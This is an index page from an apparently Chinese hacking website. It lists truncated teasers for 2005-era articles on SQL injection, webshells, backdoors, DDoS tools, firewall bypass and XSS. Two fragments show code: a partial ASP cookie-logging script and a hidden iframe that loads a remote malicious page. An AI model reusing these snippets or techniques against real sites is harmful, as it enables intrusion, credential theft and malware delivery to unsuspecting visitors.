欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!
  • 记对母校的一次非旁注攻击
  • 编者:很老的文章了,作者一直也没有发布,我把它偷出来, 给大家借鉴下思路. 一. 起因。学校的阿辉说他发的对校园DV的评论老被删,于是就想测试一下论坛的安全性,不一会就利用旁注拿到了shell,传了个HTML文件上......
  • 所属分类:漏洞预警 更新时间:2005-12-18 相关标签: 阅读全文...
  • SQL注入与ASP木马上传的又一思路
  • 文章作者:绝对零度信息来源:rohu.com本文适合有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器 SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,......
  • 所属分类:漏洞预警 更新时间:2005-12-17 相关标签: 阅读全文...
  • simplebbs漏洞利用
  • 转自:blog.56bug.org 看文章就好,看不明白的去作者下动画今天给大家演示simplebbs漏洞利用获得shell的方法,和相关漏洞工具的使用寻找目标:google里搜Powered by SimpleBBS 你会发现很多 这个论坛可以绕过验证直接发......
  • 所属分类:漏洞预警 更新时间:2005-12-17 相关标签: 阅读全文...
  • 不让上传我偏偏传
  • 近来忙着开发一个WAP手机网站,好几天都没有好好睡觉了,就是因为UTF_8转换为GB问题。网上虽然有现成的ASP脚本可以转换,但在转换过程中还是有些字符转换不了。无奈中在某个开发成功的WAP手机站页面中找到了一个技术......
  • 所属分类:漏洞预警 更新时间:2005-12-16 相关标签: 阅读全文...
  • 从搜索过滤不严到IDC主机的渗透
  • 有天跟朋友谈起BLOG备案的问题,无意中提到了空间提供商IDC。说起IDC,没想到朋友还有段非常不愉快的经历。事情是这样的:当时他也是没经验,想选个虚拟主机做网站,当然出于习惯问题,他对提供自己虚拟主机空间服务......
  • 所属分类:漏洞预警 更新时间:2005-12-16 相关标签: 阅读全文...
  • 通杀国内一些防火墙技巧
  • 一直以来都有一个梦想:偶要是能发现些漏洞或BUG什么的该多好啊!于是整天对着电脑瞎弄瞎研究,研究什么呢?研究如何突破防火墙(偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件。)嘿嘿,你还别说,还真没......
  • 所属分类:漏洞预警 更新时间:2005-12-16 相关标签: 阅读全文...
  • Byshell后门:无进程无DLL无硬盘文件
  • 适合读者:入侵爱好者、网络管理员、黑器迷前置知识:C基本语法刘流:后门是黑客们永恒的话题,在各大网站如163、Yahoo、北大等相继被黑之后,越来越多的人开始关注服务器的安全,而各种后门技术也空前地火暴起来!今......
  • 所属分类:漏洞预警 更新时间:2005-12-16 相关标签: 阅读全文...
  • 不要以为装了防火墙,我就治不了你
  • 如何使tcp包和udp包穿透 防火墙 通过本文的httptunnel 技术 同时逃过了 防火墙 的屏蔽以及系统的追踪试验,我们可以看到网络安全仅仅依靠某种或某几种手段是不可靠的,同时对安全系统的盲目性依赖往往会造成巨大的安......
  • 所属分类:漏洞预警 更新时间:2005-12-15 相关标签: 阅读全文...
  • 如何寻找WEB程序漏洞及如何利用和防范
  • 文章本打算发到杂志,因为我懒得写了,写了一遍就发到自己的BLOG上了。 网络安全是一个非常流行的话题,不论是这方面的专家还是一个普通人,都或多或少涉及其中。 在此环境下, 入侵 也变得前所未有的活跃。每个人都......
  • 所属分类:漏洞预警 更新时间:2005-12-15 相关标签: 阅读全文...
  • 用adsutil.vbs+..\+cmd.ASP打造完美后门
  • 一直以来我们为做一个好的后门而郁闷着,那些现成的后门 软件 都很难逃脱杀毒 软件 的追杀,而自己写后门对我们这些小虫虫来是又似乎不太现实。下面我将教你一个方法,让你打造只属于你自己的后门! 所须 工具 : 一......
  • 所属分类:漏洞预警 更新时间:2005-12-15 相关标签: 阅读全文...
  • 打造简单隐藏疯狂ddos攻击工具
  • xdos攻击效果是比较好的了,但是我们要做的是让他象教主的僵尸那样,放在很多肉鸡上运行,自动攻击目标服务器。xdos运行有cmd窗口,我们可以用delphi写个小程序让他隐藏窗口,并且实现开机自启动。下面是源代码,很简......
  • 所属分类:漏洞预警 更新时间:2005-12-14 相关标签: 阅读全文...
  • 动网论坛刷分刷经验漏洞
  • 动网对admin_postings.asp设置不严..在进行贴子提升时.可以自己定义数字..达到刷分..刷经验及魅力的目的. 比如我有一贴,http://127.0.0.1/dispbbs.asp?boardID=30&ID=26954&page=1然后对本贴进行提升http://......
  • 所属分类:漏洞预警 更新时间:2005-12-14 相关标签: 阅读全文...
  • 绝处逢生—Windwos 2003下的权限提升
  • 前几天渗透了某大型网站,兴奋中。拿到WebShell后,第一个念头就是提升权限,把偶亲爱的后门挂到系统里。熟练的打开CMD,输入NET USER。不是好兆头,接着在WSCRIPT组件前打钩,再次执行NET USER。提示倒是换了,但是......
  • 所属分类:漏洞预警 更新时间:2005-12-14 相关标签: 阅读全文...
  • PollVote投票系统漏洞利用
  • PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法, 不过作者说利用过程的时候很烦琐,关键的时候又没说明白, 简单的说一下`` 首先建立2个文本 分别是creatfile.txt和phpdo......
  • 所属分类:漏洞预警 更新时间:2005-12-14 相关标签: 阅读全文...
  • 最新的黑客技术:XSS跨站脚本攻击详细介绍
  • 总体上介绍简单介绍什么是XSS攻击如何寻找XSS漏洞对于XSS攻击的总体思路来自内部的攻击:如何寻找内部的XSS漏洞如何构造攻击如何利用结何实例攻击,如DVBBS&BBSXP来自外部的攻击如何构造XSS攻击如何欺骗管理员打开......
  • 所属分类:漏洞预警 更新时间:2005-12-13 相关标签: 阅读全文...
  • 更好的在肉鸡上跑:改造完美CCProxy 6.2
  • CCProxy 6.2是个十分好用的代理软件,可是没有注册的版本只允许三个用户使用,所以我想办法将它破解了。这里破解不是我们的最终目的,程序启动后会在系统托盘上留下图标,我们还要去掉它,让它更好的在肉鸡上跑。 ......
  • 所属分类:漏洞预警 更新时间:2005-12-13 相关标签: 阅读全文...
  • 去黑防钓鱼
  • 随着钓鱼式攻击技术在国内被公开以后,网络仿佛成了浩瀚的海洋,各种各样的钓鱼式攻击随处可见。一种新的技术被公开了,我岂能不去关注?于是就去网上和杂志上找了一些有关技术的文章学习,小有收获。昨天打开电子邮......
  • 所属分类:漏洞预警 更新时间:2005-12-13 相关标签: 阅读全文...
  • DDoS攻击使用的常用工具
  • DDoS攻击使用的常用工具   DDoS攻击实施起来有一定的难度,它要求攻击者必须具备入侵他人计算机的能力。但是很不幸的是一些傻瓜式的黑客程序的出现,这些程序可以在几秒钟内完成入侵和攻击程序的安装,使发动DDoS攻......
  • 所属分类:漏洞预警 更新时间:2005-12-12 相关标签: 阅读全文...
  • 突破百度贴吧的验证码限制
  • 注意:本文章05年12期黑防已发 注意版权百度,作为国内搜索引擎的大户,为了进一步扩大自己的用户群,专门开设了“百度贴吧”(2003年11月百度贴吧 (http://post.baidu.com)自从诞生以来逐渐成为世界最大的中文交流平......
  • 所属分类:漏洞预警 更新时间:2005-12-12 相关标签: 阅读全文...
  • “猫和老鼠”的较量 软件破解大揭密(多图)
  • 作为一名程序员,由于我所编写的几款小软件经常被人破解,所以就对常见的软件破解方式比较关注。在这篇文章中,我把各种软件破解方式一网打尽,如算法注册机、内存破解法、补丁破解法和文件注册法等,以便大家“知己......
  • 所属分类:漏洞预警 更新时间:2005-12-11 相关标签: 阅读全文...
  • 巧破Tegoweb
  • Tegoweb这个软件在X档案中也曾介绍过,所以对其功能有一定的了解,正好最近需要用到这个软件,所以就从光盘中将它拖了出来,安装了一下,感觉还不错,于是就决定到网上找了个汉化版的(毕竟咱是中国人嘛~~),找到了......
  • 所属分类:漏洞预警 更新时间:2005-12-11 相关标签: 阅读全文...
  • 从后台得到webshell技巧大汇总
  • 前 言  动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两......
  • 所属分类:漏洞预警 更新时间:2005-12-11 相关标签: 阅读全文...
  • 跨站攻击-偷cookies
  • < % msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("cook.txt") set fs=server.CreateObject("scripting.filesystemobject") set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.Wr......
  • 所属分类:漏洞预警 更新时间:2005-12-10 相关标签: 阅读全文...
  • 取代小竹的NBSI2:Opendatasource And Openrowset
  • 目前市面上的SQL Injection工具很多,最受推崇的当属NBSI2了。SQL Injection的方法在网上也是满天飞,大家认真学一下都会很快成为脚本入侵“高手”。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种:......
  • 所属分类:漏洞预警 更新时间:2005-12-10 相关标签: 阅读全文...
  • “万能密码”攻击路由器(图)
  • 平时,我们看到的路由器入侵事件不多,因此在很多人的印象中,路由(Routing)只是选择通过互联网络从源节点向目的节点传输信息的通道。其实,路由器的安全隐患很多,由于一般黑客接触得不太频繁,被攻击的事件很少发生......
  • 所属分类:漏洞预警 更新时间:2005-12-10 相关标签: 阅读全文...
  • 打破SSS的技术封锁
  • 最近实在是忙得不亦乐乎,一边埋头整理开学要上交的网络安全研究课题,一边在网上清理恶意网站。我的爱机也跟着我连轴转,没有多少休息的时间(还好我的机器是双Xeon的服务器,哈哈)。一天突然要用到SSS,立刻到黑白......
  • 所属分类:漏洞预警 更新时间:2005-12-09 相关标签: 阅读全文...
  • 构造特殊文件名绕过多个反病毒引擎
  • 受影响的反病毒引擎: Kaspersky Antivirus Symantec AntiVirus F-Prot Antivirus ClamWin Antivirus Avast Antivirus RAV AntiVirus Microsoft AntiSpyware 经测试版本: Symantec AntiVirus Corporate 8.0 Kaspersky......
  • 所属分类:漏洞预警 更新时间:2005-12-09 相关标签: 阅读全文...
  • 教你一招新的网页隐蔽挂马方式
  • 今天没事找了些WEBSHELL发现有很多都以给别人先占了坐打开INDEX.ASP发现<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>,早被人挂了马儿,不过把他的代马删掉换上我的就可以了,相信大多数人挂马都......
  • 所属分类:漏洞预警 更新时间:2005-12-09 相关标签: 阅读全文...
  • SONICWALL防火墙端口转发
  • 有的朋友说PS服务端在3389控制台下不能双击运行,确实有这个问题,经本一在数十台3389上测试没有一台能通过双击运行的,经过思索(条条大路通罗马嘛,这条不行就换一条罗)在我的应像中记得dos下有一......
  • 所属分类:漏洞预警 更新时间:2005-12-06 相关标签: 阅读全文...
  • 一些端口映射的资料集合
  • SONICWALL防火墙端口转发 SonicWall防火墙端口转发流程如下:以架设Web服务器为例,假设Web服务器的内网IP为192.168.0.50首先登陆到防火墙,选择“Access",然后看默认的第一项“Services”,在第一条“Web (HTTP)”......
  • 所属分类:漏洞预警 更新时间:2005-12-06 相关标签: 阅读全文...
  • 本类最新更新
    • 本类热门文章
      • 最新下载
        • 标签云集